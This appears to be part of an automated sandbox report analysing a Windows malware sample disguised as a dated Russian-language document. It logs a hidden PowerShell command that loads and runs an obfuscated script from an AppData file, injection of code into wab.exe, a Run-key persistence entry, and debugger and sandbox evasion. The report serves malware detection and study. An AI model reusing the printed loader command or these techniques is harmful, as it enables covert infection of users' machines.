            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Penttail $sulfitters $Disorb), (Competently @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Barites = [AppDomain]::CurrentDomain.GetAssemblies()$global:Far
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Copyrighter)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Baadrute44, $false).DefineType($Inculpatory,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)"
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AFDF6A push eax; iretd 2_2_07AFDF6B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AFDF5F push eax; iretd 2_2_07AFDF60
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AFDE6F push eax; iretd 2_2_07AFDE70
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AFDE64 push eax; iretd 2_2_07AFDE65
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AFDB3C push eax; iretd 2_2_07AFDB3D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AFDB31 push eax; iretd 2_2_07AFDB32
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AF7B61 push eax; iretd 2_2_07AF7B62
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AF7B56 push eax; iretd 2_2_07AF7B57
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07AF79ED push ebp; iretd 2_2_07AF79EE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0935B5A8 push cs; ret 2_2_0935B5A9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09350863 pushfd ; ret 2_2_09350865
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0935CB2B push ss; iretd 2_2_0935CB2D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0935AFBD push C0D8B181h; retf 2_2_0935AFC2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A02806 push ecx; ret 8_2_20A02819
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_03F7AFBD push C0D8B181h; retf 8_2_03F7AFC2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_03F7B5A8 push cs; ret 8_2_03F7B5A9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_03F70863 pushfd ; ret 8_2_03F70865
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_03F7CB2B push ss; iretd 8_2_03F7CB2D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00451D34 push eax; ret 14_2_00451D41
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mediatesJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mediatesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004047CB
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7108Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2644Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3513Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1343Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4124Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1760Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.6 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4704Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7696Thread sleep count: 3513 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7712Thread sleep count: 1343 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7712Thread sleep time: -4029000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7712Thread sleep count: 4124 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7712Thread sleep time: -12372000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3513 delay: -5Jump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,8_2_20A010F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A06580 FindFirstFileExA,8_2_20A06580
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\nervier\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\nervier\Estampede\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3749797161.0000000004E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wab.exe, 00000008.00000002.3749797161.0000000004E1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeAPI call chain: ExitProcess graph end nodegraph_0-3035
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_14-34115
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_3_04ECA639 LdrInitializeThunk,LdrInitializeThunk,8_3_04ECA639
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_20A060E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A04AB4 mov eax, dword ptr fs:[00000030h]8_2_20A04AB4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A0724E GetProcessHeap,8_2_20A0724E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_20A060E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A02639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_20A02639
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A02B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_20A02B1C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3F70000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 90FD6CJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
